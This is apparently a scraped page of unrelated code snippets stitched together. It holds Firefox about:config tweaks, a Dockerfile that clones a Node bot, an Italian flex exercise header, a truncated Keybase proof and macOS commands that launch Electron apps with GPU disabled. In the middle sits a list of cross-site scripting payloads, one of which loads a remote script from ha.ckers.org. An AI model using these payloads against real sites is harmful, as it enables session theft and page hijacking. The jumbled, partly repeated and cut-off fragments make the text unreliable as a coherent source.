First of all: about:config
- network.http.pipelining = true
- network.http.pipelining.maxrequests = 8
- new -> integer -> nglayout.initialpaint.delay = 100
- content.notify.ontimer = true
- content.notify.interval = 100000
| FROM ubuntu:latest | |
| MAINTAINER Domenico Luciani "[email protected]" | |
| RUN apt-get update | |
| RUN apt-get install -y git nodejs npm | |
| RUN git clone https://github.com/dlion/smagenBot /home/root/smagenBot | |
| ADD config.json /home/root/smagenBot/ | |
| WORKDIR /home/root/smagenBot | |
| RUN npm install |
| %{ | |
| /* | |
| * Scrivere un programma in flex che trasformi in maiuscole tutte le parole delle righe che cominciano con una parola di caratteri tutti minuscoli, | |
| * in minuscole tutte le parole che cominciano con una parola di caratteri tutti maiuscoli. | |
| * Le altre siano lasciate invariate. | |
| */ | |
| #include <ctype.h> | |
| int i; | |
| %} |
First of all: about:config
| ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> | |
| <IMG SRC=JaVaScRiPt:alert('XSS')> | |
| <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
| <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
| <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
| <IMG SRC=javascript:alert('XSS')> |
I hereby claim:
To claim this, I am signing this object:
On my Macbook Pro (OS X El Capitan) I was having issues on Electron based apps. These apps had visual issues/glitches like blank screens, visual components showing only when hovering or transparent menus.
By opening with these comands, the problems disappeared.
open /Applications/Slack.app/ --args --disable-gpu
open /Applications/Trello.app/ --args --disable-gpu
open /Applications/Whatsapp.app/ --args --disable-gpu